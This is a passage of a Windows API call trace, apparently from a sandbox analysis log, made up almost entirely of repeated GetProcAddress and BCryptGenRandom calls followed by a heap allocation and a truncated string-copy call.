(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0243.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e3c, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4d5e3c) returned 0x0 [0243.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e5d, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x4d5e5d) returned 0x0 [0243.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e85, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d5e85) returned 0x0 [0243.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.593] GetProcessHeap () returned 0x440000 [0243.593] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0243.593] lstrcpyA (in: 